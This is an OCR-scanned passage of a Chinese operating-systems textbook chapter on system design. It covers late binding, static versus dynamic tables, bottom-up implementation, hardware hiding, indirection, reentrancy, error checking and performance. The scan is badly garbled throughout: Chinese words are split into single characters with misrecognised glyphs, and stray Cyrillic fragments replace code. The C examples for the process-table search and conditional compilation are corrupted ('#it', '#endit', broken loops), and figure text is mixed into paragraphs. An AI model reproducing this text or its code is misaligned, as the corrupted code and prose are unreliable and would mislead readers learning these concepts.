够 立刻 提供 零 部 件 ， 不 需要 事先 通知 。 这 就 是 晚期 绑 定 。 

程序 设计 语言 对 于 变量 通常 支持 多 种 绑 定时 机 。 编 译 器 将 全 局 变量 绑 定 到 特殊 的 虚拟 地 址 ， 这 是 早 
期 绑 定 的 例子 。 过 程 的 局 部 变量 在 过 程 被 调用 的 时 刻 (在 栈 中 ) 分 配 一 个 虚拟 地 址 ， 这 是 中 间 绑 定 。 存 
放 在 堆 中 的 变量 (这 些 变量 由 C 中 的 malloc 或 Java 中 的 new 分 配 ) 仅仅 在 它们 实际 被 使 用 的 时 候 才 分 配 虚 
拟 地 址 ， 这 便 是 晚期 绑 定 。 

操作 系统 对 大 多 数 数据 结构 通常 使 用 早期 绑 定 ， 但 是 偶尔 为 了 灵活 性 也 使 用 晚期 绑 定 。 内 存 分 配 是 
-个 相关 的 案例 。 在 缺乏 地 址 重 定位 硬件 的 机 器 上 ， 早 期 的 多 道 程序 设计 系统 不 得 不 在 某 个 内 存 地 址 装 
载 一 个 程序 ， 并 且 对 其 重 定位 以 便 在 此 处 运行 。 如 果 它 曾经 被 交换 出 去 ， 那 么 它 就 必须 装 回 到 相同 的 内 
存 地址 ， 否 则 就 会 出 错 。 相 反 ， 页 式 虚拟 内 存 是 晚期 绑 定 的 一 种 形式 。 在 页 面 被 访问 并 且 实际 装 入 内 存 
之 前 ， 与 一 个 给 定 的 虚拟 地 址 相对 应 的 实际 物理 地 址 是 不 知道 的 。 

晚期 绑 定 的 另 一 个 例子 是 GUI 中 窗口 的 放置 。 在 早期 图 形 系统 中 ， 程 序 员 必 须 为 屏幕 上 的 所 有 图 像 
设 定 绝对 屏幕 坐标 ， 与 此 相对 照 ， 在 现代 GUI 中 ， 软 件 使 用 相对 于 窗口 原点 的 坐标 ， 但 是 在 窗口 被 放置 
在 屏幕 上 之 前 该 坐标 是 不 确定 的 ， 并 且 以 后 ， 它 甚至 是 可 能 改变 的 。 


13.3.6 静态 与 动态 结构 

操作 系统 设计 人 员 经 常 被 迫 在 静 态 与 动态 数据 结构 之 间 进 行 选择 。 静 态 结构 总 是 简单 易 懂 ， 更 加 容 
易 编程 并 且 用 起 来 更 快 ， 动 态 结构 则 更 加 灵活 。 一 个 显而易见 的 例子 是 进程 表 。 早 期 的 系统 只 是 分 配 一 
个 固定 的 数组 ， 存 放 每 个 进程 结构 。 如 果 进 程 表 由 256 项 组 成 那么 在 任意 时 刻 只 能 存在 256 个 进程 。 试 
图 创建 第 257 个 进程 将 会 失败 ， 因 为 缺乏 表 空间 。 类 似 的 考虑 对 于 打开 的 文件 表 (每 个 用 户 的 和 系统 范 


图 13-4 目录 用 来 将 外 部 名 字 映 射 到 内 部 名 字 上 
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围 的 ) 以 及 许多 其 他 内 核 表格 也 是 有 效 的 。 
一 个 替代 的 策略 是 将 进程 表 建 立 为 一 个 小 型 表 的 链表 ， 最 初 只 有 一 个 表 。 如 果 该 表 被 填 满 ， 可 以 从 
全 局 存储 池 中 分 配 另 一 个 表 并 且 将 其 链接 到 前 一 个 表 。 这 样 ， 在 全 部 内 核 内 存 被 耗 尽 之 前 ， 进 程 表 不 可 


能 被 填 满 。 = 
另 一 方面 ， 搜 索 表格 的 代码 for (P = болос ане; p < &proc_tablelPROC_TABLE_SIZE} p+) ( 

会 变 得 更 加 复杂 。 例 如 ， 在 图 "орос рена ри { 

13-5 中 给 出 了 搜索 一 个 静态 进程 break; _ 

表 以 查找 给 定 PID，pid 的 代码 。 } ) 

该 代码 简单 有 效 。 对 于 小 型 表 的 

链表 ， 做 同样 的 搜索 则 需要 更 多 图 13-5 对 于 给 定 PID 搜 索 进 程 表 的 代码 


的 工作 。 

当 存在 大 量 的 内 存 或 者 当 表 的 利用 可 以 猜测 得 相当 准确 时 ， 静 态 表 是 最 佳 的。 例如 ， 在 一 个 单 用 户 
系统 中 ， 用 户 不 太 可 能 立刻 启动 64 个 以 上 的 进程 ， 并 且 如 果 试 图 启动 第 65 个 进程 失败 了 ， 也 并 不 是 一 个 

还 有 另 一 种 选择 是 使 用 一 个 固定 大 小 的 表 ， 但 是 如 果 访 表 填 满 了 ， 就 分 配 一 个 新 的 固定 大 小 的 表 ， 
比方 说 大 小 是 原来 的 两 倍 。 然 后 将 当前 的 表 项 复制 到 新 表 中 并 且 把 旧 表 返回 空闲 存储 地 。 这 样 ， 表 总 是 
连续 的 而 不 是 链接 的 。 此 处 的 缺点 是 需要 某 些 存储 管理 ， 并 且 现 在 表 的 地 址 是 变量 而 不 是 常量 。 

对 于 内 核 栈 也 存在 类 似 的 问题 。 当 一 个 线程 切换 到 内 核 模式 ， 或 者 当 一 个 内 核 模式 线程 运行 时 ， 它 
在 内 核 空间 中 需要 一 个 栈 。 对 于 用 户 线程 ， 栈 可 以 初始 化 成 从 虚拟 地 址 空间 的 顶部 向 下 生长 ， 所 以 大 小 
不 需要 预先 设 定 。 对 于 内 核 线程 ， 大 小 必须 预先 设 定 ， 因 为 栈 占据 了 某 些 内 核 虚 拟 地 址 空间 并 且 可 能 存 
在 许多 栈 。 问 题 是 : 每 个 栈 应 该 得 到 多 少 空间 ? 此 处 的 权衡 与 进程 表 是 类 似 的 。 

另 一 个 静态 -动态 权衡 是 进程 调度 。 在 某 些 系统 中 ， 特 别 是 在 实时 系统 中 ， 调 度 可 以 预先 静态 地 完 
成 。 例 如 ， 航 空 公司 在 班机 启 航 前 几 周 就 知道 它 的 飞机 什么 时 候 要 出 发 。 类 似 地 ， 多 媒体 系统 预先 知道 
何 时 调度 音频 、 视 频 和 其 他 进程 。 对 于 通用 的 应 用 ， 这 些 考虑 是 不 成 立 的 ， 并 且 调 度 必须 是 动态 的 。 

还 有 一 个 静态 -动态 问题 是 内 核 结构 。 如 果 内 核 作为 单一 的 二 进 制程 序 建立 并 且 装 载 到 内 存 中 运行 ， 
情况 是 比较 简单 而 ， 这 一 设计 的 结果 是 添加 一 个 新 的 1/O 设 备 就 需要 将 内 核 与 新 的 设备 驱动 程序 
重新 链接 。UNIX 的 早期 版 本 就 是 以 这 种 方式 工作 的 ， 在 小 型 计算 机 环境 中 它 相当 令 人 满意 ， 那 时 添加 
新 的 IO 设备 是 十 分 罕见 的 事情 。 如 今 ， 大 多 数 操作 系统 允许 将 代码 动态 地 添加 到 内 核 之 中 ， 随 之 而 来 
的 则 是 所 有 额外 的 复杂 性 。 


13.37 自 项 向 下 与 自 底 向 上 的 实现 

虽然 最 好 是 自 顶 向 下 地 设计 系统 ， 但 是 在 理论 上 系统 可 以 自 顶 向 下 或 者 自 底 向 上 地 实现 。 在 自 顶 向 
下 的 实现 中 ， 实 现 者 以 系统 调用 处 理 程序 为 开端 ， 并 且 探 究 需要 什么 机 制 和 数据 结构 来 支持 它们 。 接 着 
编写 这 些 过 程 等 ， 直 到 触及 硬件 。 

这 种 方法 的 问题 是 ， 由 于 只 有 顶层 过 程 可 用 ， 任 何事 情 都 难于 测试 。 出 于 这 样 的 原因 ， 许 多 开发 人 
员 发 现实 际 上 自 底 向 上 地 构建 系统 更 加 可 行 。 这 一 方法 需要 首先 编写 隐藏 底层 硬件 的 代码 ， 特 别 是 图 
11-6 中 的 HAL。 中 上 断 处 理 程序 和 时 钟 驱 动 程序 也 是 早期 就 需要 的 

然后 ， 可 以 使 用 一 个 简单 的 调度 器 (例如 轮转 调度 ) 来 解决 多 道 程序 设计 问题 。 在 这 一 时 刻 ， 测 试 
系统 以 了 解 它 是 否 能 够 正确 地 运行 多 个 进程 应 该 是 可 能 的 。 如 果 运 转正 常 ， 此 时 可 以 开始 仔细 地 定义 贰 
穿 系 统 的 各 种 各 样 的 表格 和 数据 结构 ， 特 别 是 那些 用 于 进程 和 线程 管理 以 及 后 面 内 存 管理 的 表格 与 数据 
结构 。IO 和 文件 系统 在 最 初 可 以 等 一 等 ， 用 于 测试 和 调试 目的 的 读 键盘 与 写 屏幕 的 基本 方法 除外 。 在 
某 些 情况 下 ， 关 键 的 低层 数据 结构 应 该 得 到 保护 ， 这 可 以 通过 只 克 许 经 由 特定 的 访问 过 程 来 访问 而 实现 
实际 上 这 是 面向 对 象 的 程序 设计 思想 ， 不 论 采用 何 种 程序 设计 语言 。 当 较 低 的 层次 完成 时 ， 可 以 彻底 地 
测 斌 它们。 这样， 系统 自 底 向 上 推进 ， 很 像 是 建筑 商 建造 高 层 办 公 楼 的 方式 。 

如 果 有 一 个 大 型 团队 可 用 ， 那 么 替代 的 方法 是 首先 做 出 整个 系统 的 详细 设计 ， 然 后 分 配 不 同 的 小 组 
编写 不 同 的 模块 。 每 个 小 组 独立 地 测试 自己 的 工作 。 当 所 有 的 部 分 都 准备 好 时 ， 可 以 将 它们 集成 起 来 并 
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加 以 测试 。 这 一 设计 方式 存在 的 问题 是 ， 如 果 最 初 没有 什么 可 以 运转 ， 可 能 难于 分 离 出 一 个 或 多 个 模块 
否 工作 不 正常 ， 或 者 一 个 小 组 是 否 误解 了 某 些 其 他 模块 应 该 做 的 事情 。 尽 管 如 此 ， 如 果 有 大 型 团队 ， 
还 是 经 常 使 用 该 方法 使 程序 设计 工作 中 的 并 行程 度 最 大 化 。 


13.3.8 实用 技术 

我 们 刚刚 了 解 了 系统 设计 与 实现 的 某 些 抽象 思想 ， 现 在 将 针对 系统 实现 考察 一 些 有 用 的 具体 技术 。 
这 方面 的 技术 很 多 ， 但 是 篇 幅 的 限制 使 我 们 只 能 介绍 其 中 的 少数 技术 。 

1. 隐藏 硬件 

许多 硬件 是 十 分 麻烦 的 , 所 以 只 好 尽早 将 其 隐藏 起 来 (除非 它 要 展现 能 力 , 而 大 多 数 硬件 不 会 这 样 )。 
某 些 非常 低层 的 细节 可 以 通过 如 图 13-2 所 示 的 HAL 类 型 的 层次 得 到 隐藏 。 然 而 ， 许 多 硬件 细节 不 能 以 这 
样 的 方式 来 隐藏 。 

值得 尽早 关注 的 一 件 事情 是 如 何 处 理 中 断 。 中 断 使 得 程序 设计 令 人 不 愉快 ， 但 是 操作 系统 必须 对 它 
们 进行 处 理 。 一 种 方法 是 立刻 将 中 断 转变 成 别 的 东西 ， 例 如 ， 每 个 中 断 都 可 以 转变 成 即时 弹出 的 线程 。 
在 这 一 时 刻 ， 我 们 处 理 的 是 线程 ， 而 不 是 中 断 。 

第 二 种 方法 是 将 每 个 中 断 转换 成 在 一 个 互 斥 量 上 的 unlock 操 作 , 该 互 斥 量 对 应 正在 等 待 的 驱动 程序 。 

于 是 ， 中 断 的 惟一 效果 就 是 导致 菜 个 线程 变 为 就 绪 。 
第 三 种 方法 是 将 一 个 中 断 转换 成 发 送 给 某 个 线程 的 消息 。 低 层 代码 只 是 构造 一 个 表明 中 断 来 自 何 处 
息 ， 将 其 排 人 队列， 并 且 调 用 调度 器 以 (潜在 地 ) 运行 处 理 程序 ， 而 处 理 程序 可 能 正在 阻塞 等 待 该 
。 所 有 这 些 技术 ， 以 及 其 他 类 似 的 技术 ， 都 试图 将 中 断 转换 成 线程 同步 操作 。 让 每 个 中 断 由 一 个 适 
当 的 线程 在 适当 的 上 下 文中 处 理 ， 比 起 在 中 断 碰巧 发 生 的 随意 上 下 文中 运行 处 理 程序 ， 前 者 要 更 加 容易 
管理 。 当 然 ， 这 必须 高 效率 地 进行 ， 而 在 操作 系统 内 部 深 处 ， 一 切 都 必须 高 效率 地 进行 。 

大 多 数 操作 系统 被 设计 成 运行 在 多 个 硬件 平台 上 。 这 些 平台 可 以 按照 CPU 、MMU、 字 长 、 
RAM 大 小 以 及 不 能 容易 地 由 HAL 或 等 价 物 屏 项 的 其 他 特性 来 区 分 。 尽 管 如 此 ， 人 们 高 度 期 望 拥有 单一 
的 一 组 源 文件 用 来 生成 所 有 的 版 本 ， 否 则 ， 后 来 发 现 的 每 个 程序 错误 必须 在 多 个 源 文件 中 修改 多 次 ， 从 
而 有 源 文件 逐渐 疏远 的 危险 。 

某 些 硬件 的 差异 ， 例 如 RAM 大 小 ， 可 以 通过 让 操作 系统 在 引导 的 时 候 确 定 其 取 值 并 且 保 存在 一 个 
变量 中 来 处 理 。 内 存 分 配器 可 以 利用 RAM 大 小 变量 来 确定 构造 多 大 的 数据 块 高 速 缓存 、 页 表 等 。 甚 至 
静态 的 表格 ， 如 进程 表 ， 也 可 以 基于 总 的 可 用 内 存 来 确定 大 小 。 

然而 ， 其 他 的 差异 ， 例 如 不 同 的 CPU 芯片 ， 就 不 能 让 单一 的 二 进 制 代码 在 运行 的 时 候 确 定 它 正 在 哪 
一 个 CPU 上 运行 。 解 决 一 个 源 代码 多 个 目标 机 的 问题 的 一 种 方法 是 使 用 条 件 编译 。 在 源 文件 中 ， 定 义 了 
一 定 的 编译 时 标志 用 于 不 同 的 配置 ， 并 且 这 些 标志 用 来 将 独立 于 CPU、 字 长 、MMU 等 的 代码 用 括号 括 
起 。 例 如 ， 设 想 一 个 操作 系统 运行 在 Pentium 和 UltraSPARC 芯 片上 ， 这 就 需要 不 同 的 初始 化 代码 。 可 以 
像 图 13-6a 中 那样 编写 init 过 程 的 代码 。 根 据 CPU 的 取 值 (该 值 定义 在 头 文件 config.h 中 ) ， 实 现 一 种 初始 
化 或 其 他 的 初始 化 过 程 。 由 于 实际 的 二 进 制 代码 只 包含 目标 机 所 需要 的 代码 ， 这 样 就 不 会 损失 效率 。 


#include "config.h" #include "config.h" 
кй) #1 (WORD_LENGTH == 32) 
{ typedef int Register 

#it (CPU == PENTIUM) #endit 


Кесе айаны аана а #if (WORD_LENGTH == 64) 


typedef long Register 
#it (CPU == ULTRASPARC) #endif 


各 是 UltraSPARC 的 初始 化 */ Register RO, R1, R2, АЗ; 


a) b) 
图 13-6 а) 依赖 CPU 的 条 件 编译 ，b) 依赖 字 长 的 条 件 编译 
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第 二 个 例子 ， 假 设 需要 一 个 数据 类 型 Register， 它 在 Pentium 上 是 32 位 ， 在 UltraSPARC 上 是 64 位 。 
这 可 以 由 图 13-6b 中 的 条 件 代码 来 处 理 (假设 编译 器 产生 32 位 的 int 和 64 位 的 long)。 一 旦 做 出 这 样 的 定义 
(可 能 是 在 别 的 什么 地 方 的 头 文件 中 )， 程 序 员 就 可 以 只 需 声 明 变量 为 Register 类 型 并 且 确 信 它 们 将 具有 
正确 的 长 度 。 

当然 ， 头 文件 configh 必 须 正确 地 定义 。 对 于 Pentium 处 理 器 ， 它 大 概 是 这 样 的 : 

#define CPU PENTIUM 

#define WORD_LENGTH 32 

为 了 编译 针对 UltraSPARC 的 系统 ,应 该 使 用 不 同 的 config .h， 其 中 具有 针对 UltraSPARC 的 正确 取 值 ， 
它 或 许 是 这 样 的 : 

#define CPU ULTRASPARC 

#define WORD_LENGTH 64 

一 些 读者 可 能 奇怪 为 什么 CPU 和 WORD_LENGTH 用 不 同 的 宏 来 处 理 。 我 们 可 以 很 容易 地 用 针对 
CPU 的 测试 而 将 Register 的 定义 用 括号 括 起 ， 对 于 Pentium 将 其 设置 为 32 位 ， 对 于 UltraSPARC 将 其 设置 为 
64 位 。 然 而 ， 这 并 不 是 一 个 好 主意 。 考 虑 一 下 以 后 当 我 们 将 系统 移植 到 64 位 Intel Itanium 处 理 器 时 会 发 
生 什么 事情 。 我 们 可 能 不 得 不 为 了 Itanium 而 在 图 13-6b 中 添加 第 三 个 条 件 。 通 过 像 上 面 那样 定义 宏 ， 我 
们 要 做 的 全 部 事情 是 在 config.h 文 件 中 为 lanium 处 理 器 包含 如 下 的 代码 行 : 

#define WORD_LENGTH 64 


这 个 例子 例证 了 前 面 讨论 过 的 正 交 性 原则 。 那 些 依赖 CPU 的 细节 应 该 基于 CPU 宏 而 条 件 编译 ， 而 那 
些 依赖 字 长 的 细节 则 应 该 使 用 WORD_LENGTH 宏 。 类 似 的 考虑 对 于 许多 其 他 参数 也 是 适用 的 。 

2. 间接 

人 们 不 时 地 说 在 计算 机 科学 中 没有 什么 问题 不 能 通过 另 一 个 层次 间接 得 到 解决 。 虽 然 有 些 夸大 其 词 ， 
但 是 其 中 的 确 存在 一 定 程度 的 真实 性 。 让 我 们 考虑 一 些 例子 。 在 基于 Pentium 的 系统 上 ， 当 一 个 键 被 按 下 
时 ， 硬 件 将 生成 一 个 中 断 并 且 将 键 的 编号 而 不 是 ASCII 字 符 编码 送 到 一 个 设备 寄存 器 中 。 此 外 ， 当 此 键 后 
来 被 释放 时 ， 第 二 个 中 断 生成 ， 同 样 伴随 一 个 键 编号 。 间 接 为 操作 系统 使 用 键 编 号 作为 索引 检索 一 张 表 
格 以 获取 ASCII 字 符 提供 了 可 能 ， 这 使 得 处 理 世 界 上 不 同 国家 使 用 的 许多 键盘 十 分 容易 。 获 得 按 下 与 释放 
两 个 信息 使 得 将 任何 键 作为 换 档 键 成 为 可 能 ， 因 为 操作 系统 知道 键 按 下 与 释放 的 准确 序列 。 

间接 还 被 用 在 输出 上 。 程 序 可 以 写 ASCII 字 符 到 屏幕 上 ， 但 是 这 些 字符 被 解释 为 针对 当前 输出 字体 
的 一 张 表格 的 索引 。 表 项 包含 字符 的 位 图 。 这 一 间接 使 得 将 字符 与 字体 相 分 离 成 为 可 能 。 

间接 的 另 一 个 例子 是 UNIX 中 主 设备 号 的 使 用 。 在 内 核 内 部 ， 有 一 张 表格 以 块 设备 的 主 设备 号 作为 
索引 ， 还 有 另 一 张 表格 用 于 字符 设备 。 当 一 个 进程 打开 一 个 特定 的 文件 (例如 /dev/hd0) 时 ， 系 统 从 i 节 
点 提取 出 类 型 ( 块 设备 或 字符 设备 ) 和 主 副 设备 号 ， 并 且 检 索 适 当 的 驱动 程序 表 以 找到 驱动 程序 。 这 一 
间接 使 得 重新 配置 系统 十 分 容易 ， 因 为 程序 涉及 的 是 符号 化 的 设备 名 ， 而 不 是 实际 的 驱动 程序 名 。 

还 有 另 一 个 间接 的 例子 出 现在 消息 传递 的 系统 中 ， 该 系统 命名 一 个 邮箱 而 不 是 一 个 进程 作为 消息 的 
目的 地 。 通 过 间接 使 用 邮箱 〈 而 不 是 指定 一 个 进程 作为 目的 地 ) ， 能 够 获得 相当 可 观 的 灵活 性 (例如 ， 
让 一 位 秘书 处 理 她 的 老板 的 消息 ) 。 

在 某 种 意义 上 ， 使 用 诸如 

#define PROC_TABLE_SIZE 256 
的 宏 也 是 间接 的 一 种 形式 ， 因 为 程序 员 无 须知 道 表格 实际 有 多 大 就 可 以 编写 代码 。 一 个 良好 的 习惯 是 为 
所 有 的 常量 提供 符号 化 的 名 字 〈 有 时 -1、0 和 1 除外 )， 并 且 将 它们 放 在 头 文件 中 ， 同 时 提供 注释 解释 它 
们 代表 什么 。 

3. 可 重用 性 

在 略微 不 同 的 上 下 文中 重用 相同 的 代码 通常 是 可 行 的 。 这 样 做 是 一 个 很 好 的 想法 ， 因 为 它 减少 了 二 
进 制 代码 的 大 小 并 且 意 味 着 代码 只 需要 调试 一 次 。 例 如 ， 假 设 用 位 图 来 跟踪 磁盘 上 的 空闲 块 。 磁 盘 块 管 
理 可 以 通过 提供 管理 位 图 的 过 程 alloc 和 free 得 到 处 理 。 
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在 最 低 限 度 上 ， 这 些 过 程 应 该 对 任何 磁盘 起 作用 。 但 是 我 们 可 以 比 这 更 进一步 。 相 同 的 过 程 还 可 以 
用 于 管理 内 存 块 、 文 件 系 统 块 高 速 缓存 中 的 块 ， 以 及 i 节点 。 事 实 上 ， 它 们 可 以 用 来 分 配 与 回收 能 够 线 
性 编号 的 任意 资源 。 

4. 重 入 

重 入 指 的 是 代码 同时 被 执行 两 次 或 多 次 的 能 力 。 在 多 处 理 器 系统 上 ， 总 是 存在 着 这 样 的 危险 ， 当 一 
个 CPU 执行 某 个 过 程 时 ， 另 一 个 CPU 在 第 一 个 完成 之 前 也 开始 执行 它 。 在 这 种 情况 下 ， 不 同 CPU 上 的 两 
个 (或 多 个 ) 线程 可 能 在 同时 执行 相同 的 代码 。 这 种 情况 必须 通过 使 用 互 斥 量 或 者 某 些 其 他 保护 临界 区 
的 方法 进行 处 理 。 ` 

然而 ， 在 单 处 理 器 上 ， 问 题 也 是 存在 的 。 特 别 地 ， 大 多 数 操作 系统 是 在 允许 中 断 的 情况 下 运行 的 。 
否则 ， 将 丢失 许多 中 断 并 且 使 系统 不 可 靠 。 当 操作 系统 忙于 执行 某 个 过 程 P 时 ， 完 全 有 可 能 发 生 一 个 中 
断 并 且 中 断 处 理 程序 也 调用 P。 如 果 P 的 数据 结构 在 中 断 发 生 的 时 刻 处 于 不 一 致 的 状态 ， 中 上 断 处 理 程序 就 
会 注意 到 它们 处 于 不 一 致 的 状态 并 且 失 败 。 

可 能 发 生 这 种 情况 的 一 个 显而易见 的 例子 是 P 是 调度 器 。 假 设 某 个 进程 用 完了 它 的 时 间 配 额 ， 并 且 
操作 系统 正 将 其 移动 到 其 队列 的 未 尾 。 在 列表 处 理 的 半路 ， 中 断 发 生 了 ， 使 得 某 个 进程 就 结 ， 并 且 运 行 
调度 器 。 由 于 队列 处 于 不 一 致 的 状态 ， 系 统 有 可 能 会 崩溃 。 因 此 ， 即 使 在 单 处 理 器 上 ， 最 好 是 操作 系统 
的 大 部 分 为 可 重 和 的， 关键 的 数据 结构 用 互 斥 量 来 保护 ， 并 且 在 中 断 不 被 允许 的 时 刻 禁用 中 断 。 

5. È ik 

使 用 讲 力 法 解决 问题 多 年 以 来 获得 了 较 差 的 名 声 ， 但 是 依据 简单 性 它 经 常 是 行 之 有 效 的 方法 。 每 个 
操作 系统 都 有 许多 很 少 会 调用 的 过 程 或 是 具有 很 少数 据 的 操作 ， 不 值得 对 它们 进行 优化 。 例 如 ， 在 系统 
内 部 经 常 有 必要 搜索 各 种 表格 和 数组 。 蛮 力 算法 只 是 让 表格 保持 表 项 建立 时 的 顺序 ， 并 且 当 必须 查找 某 
个 东西 时 线性 地 搜索 表格 。 如 果 表 项 的 数目 很 少 (例如 少 于 1000 个 )， 对 表格 排序 或 建立 散 列表 的 好 处 
不 大 ， 但 是 代码 却 复杂 得 多 并 且 很 有 可 能 在 其 中 存在 错误 。 

当然 ， 对 处 于 关键 路 径 上 的 功能 ， 例 如 上 下 文 切换 ， 使 它们 加 快速 度 的 一 切 措施 都 应 该 尽力 去 做 ， 
即使 可 能 要 用 汇编 语言 编写 它们 。 但 是 ， 系 统 的 大 部 分 并 不 处 于 关键 路 径 上 。 例 如 ， 许 多 系统 调用 很 少 
被 调用 。 如 果 每 隔 1 秒 有 一 个 fork 调 用 ， 并 且 该 调用 花费 1 毫秒 完成 ， 那么 即便 将 其 优化 到 花费 0 秒 也 不 过 
仅 有 0.1% 的 获 益 。 如 果 优化 过 的 代码 更 加 庞大 且 有 更 多 错误 ， 那 就 不 必 多 此 一 举 了 。 

6. 首先 检查 错误 

由 于 各 种 各 样 的 原因 ， 许 多 系统 调用 可 能 潜在 地 会 失败 : 要 打开 的 文件 属于 他 人 ， 因 为 进程 表 满 而 
创建 进程 失败 ， 或 者 因为 目标 进程 不 存在 而 使 信号 不 能 被 发 送 。 操 作 系统 在 执行 调用 之 前 必须 无 微 不 至 
地 检查 每 一 个 可 能 的 错误 。 

许多 系统 调用 还 需要 获得 资源 ， 例 如 进程 表 的 空位 、i 节 点 表 的 空位 或 文件 描述 符 。-- 般 性 的 建议 
是 在 获得 资源 之 前 ， 首 先进 行 检查 以 了 解 系统 调用 能 否 实际 执行 ， 这 样 可 以 省 去 许多 麻烦 。 这 意味 着 ， 
将 所 有 的 测试 放 在 执行 系统 调用 的 过 程 的 开始 。 每 个 测试 应 该 具有 如 下 的 形式 : 

if (error_condition) return(ERROR_CODE); 


如 果 调 用 通过 了 所 有 严格 的 测试 ， 那 么 就 可 以 肯定 它 将 会 取得 成 功 。 在 这 一 时 刻 它 才能 获得 资源 。 

如 果 将 获得 资源 的 测试 分 散 开 ， 那么 就 意味 着 如 果 在 这 一 过 程 中 某 个 测试 失败 ， 到 这 一 时 刻 已 经 获 
得 的 所 有 资源 都 必须 归还 。 如 果 在 这 里 发 生 了 一 个 错误 并 且 资 源 没有 被 归还 ， 可 能 并 不 会 立刻 发 生 破坏 。 
例如 ， 一 个 进程 表 项 可 能 只 是 变 得 永久 地 不 可 用 。 然 而 ， 随 着 时 间 的 流逝 ， 这 一 差错 可 能 会 触发 多 次 。 最 
终 ， 大 多 数 或 全 部 进程 表 项 可 能 都 会 变 得 不 可 用 ， 导致 系统 以 一 种 极度 不 可 预料 且 难 以 调试 的 方式 崩溃 。 

许多 系统 以 内 存 泄漏 的 形式 遭受 了 这 一 问题 的 侵害 。 典 型 地 ， 程 序 调用 malloc 分 配 了 空间 ， 但 是 以 
2 了 调用 free 释 放 它 。 逐 渐 地 ， 所 有 的 内 存 都 消失 了 ， 直 到 系统 重新 启动 。 

Engler A (2000) 推荐 了 一 种 有 趣 的 方法 在 编译 时 检查 某 些 这 样 的 错误 。 他 们 注意 到 程序 员 知道 
许多 定式 而 编译 器 并 不 知道 ， 例 如 当 你 锁定 一 个 互 斥 量 的 时 候 ， 所 有 在 锁定 操作 处 开始 的 路 径 都 必须 包 
含 一 个 解除 锁定 的 操作 并 且 在 相同 的 互 斥 量 上 没有 更 多 的 锁定 。 他 们 设计 了 一 种 方法 让 程序 员 将 这 一 事 
实 告诉 编译 器 ， 并 且 指 示 编 译 器 在 编译 时 检查 所 有 路 径 以 发 现 对 定式 的 违犯 。 程 序 员 还 可 以 设 定 已 分 配 
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的 内 存 必须 在 所 有 路 径 上 释放 ， 以 及 设 定 许 多 其 他 的 条 件 。 


13.4 性 能 

所 有 事情 都 是 平等 的 ， 一 个 快速 的 操作 系统 比 一 个 慢 速 的 操作 系统 好 。 然 而 ， 一 个 快速 而 不 可 靠 的 
操作 系统 还 不 如 一 个 慢 速 但 可 靠 的 操作 系统 。 由 于 复杂 的 优化 经 常会 导致 程序 错误 ， 有 节制 地 使 用 它们 
是 很 重要 的 。 尽 管 如 此 ， 在 性 能 是 至 关 重 要 的 地 方 进行 优化 还 是 值得 的 。 在 下 面 儿 节 我 们 将 看 一 些 一 般 
的 技术 ， 这 些 技术 在 特定 的 地 方 可 以 用 来 改进 性 能 。 
13.4.1 操作 系统 为 什么 运行 缓慢 

在 讨论 优化 技术 之 前 ， 值 得 指出 的 是 许多 操作 系统 运行 缓慢 在 很 大 程度 上 是 操作 系统 自身 造成 的 。 
例如 ， 古 老 的 操作 系统 ， 如 MS-DOS 和 UNIX 版 本 7 在 几 秒 钟 内 就 可 以 启动 。 现 代 UNIX 系 统 和 Windows 
Vista 尽 管 运行 在 快 1000 倍 的 硬件 上 ， 可 能 要 花费 几 分 钟 才能 启动 。 原 因 是 它们 要 做 更 多 的 事情 ， 有 用 的 
或 无 用 的 。 看 一 个 相关 的 案例 。 即 插 即 用 使 得 安装 一 个 新 的 硬件 设备 相当 容易 ， 但 是 付出 的 代价 是 在 每 
次 启动 时 ， 操 作 系统 都 必须 要 检查 所 有 的 硬件 以 了 解 是 否 存在 新 的 设备 。 这 一 总 线 扫描 是 要 花 时 间 的 。 

一 种 替代 的 (并且 依 作者 看 来 是 更 好 的 ) 方法 是 完全 抛弃 即 插 即 用 ， 并 且 在 屏幕 上 包含 一 个 图 标 标 
明 “ 安 装 新 硬件 "。 当 安装 一 个 新 的 硬件 设备 时 ， 用 户 可 以 点 击 图 标 开始 总 线 扫描 ， 而 不 是 在 每 次 启动 


， 的 时 候 做 这 件 事 情 。 当 然 ， 当 今 的 系统 设计 人 员 是 完全 知道 这 一 选择 的 。 但 是 他 们 拒绝 这 一 选择 ， 主 要 


是 因为 他 们 假设 用 户 太 过 遇 笨 而 不 能 正确 地 做 这 件 事情 (尽管 他 们 使 用 了 更 加 友好 的 措辞 )。 这 只 是 一 
个 例子 ， 但 是 还 存在 更 多 的 事例 ， 期 望 让 系统 “用 户 友好 ”( 或 者 “ 防 傻瓜 "， 取 决 于 你 的 看 法 ) 却 使 系 
统 始终 对 所 有 用 户 是 缓慢 的 。 

或 许 系统 设计 人 员 为 改进 性 能 可 以 做 的 最 大 的 一 件 事情 ,是 对 于 添加 新 的 功能 特性 更 加 具有 选择 性 。 
要 问 的 问题 不 是 “用 户 会 喜欢 吗 ?》” 而 是 “这 一 功能 特性 按照 代码 大 小 、 速 度 、 复 杂 性 和 可 靠 性 值得 不 
计 代价 吗 ? ”只 有 当 优点 明显 地 超过 缺点 的 时 候 ， 它 才 应 该 被 包括 。 程 序 员 倾向 于 假设 代码 大 小 和 程序 
错误 计数 为 0 并 且 速度 为 无 穷 大 。 经 验 表明 这 种 观点 有 些 过 于 乐观 。 

另 一 个 重要 因素 是 产品 的 市 场 销售 。 到 某 件 产品 的 第 4 或 第 5 版 上 市 的 时 候 ， 真 正 有 用 的 所 有 功能 特 
性 或 许 已 经 全 部 包括 了 ， 并 且 需 要 该 产品 的 大 多 数 人 已 经 拥有 它 了 。 为 了 保持 销售 ， 许 多 生产 商 仍然 继 
续 生 产 新 的 版 本 ， 具 有 更 多 的 功能 特性 ， 正 是 这 样 才 可 以 向 现 有 的 顾客 出 售 升级 版 。 只 是 为 了 添加 新 的 
功能 特性 而 添加 新 的 功能 特性 可 能 有 助 于 销售 ， 但 是 很 少 会 有 助 于 性 能 。 


13.4.2 什么 应 该 优化 

作为 一 般 的 规则 ， 系 统 的 第 一 版 应 该 尽 可 能 简单 明了 。 惟 一 的 优化 应 该 是 那些 显而易见 要 成 为 不 可 
避免 的 问题 的 事情 。 为 文件 系统 提供 块 高 速 缓存 就 是 这 样 的 一 个 例子 。 一 旦 系统 引导 起 来 并 运行 ， 就 应 
该 仔细 地 测量 以 了 解 时 间 真 正 花 在 了 什么 地 方 。 基 于 这 些 数字 ， 应 该 在 最 有 帮助 的 地 方 做 出 优化 。 

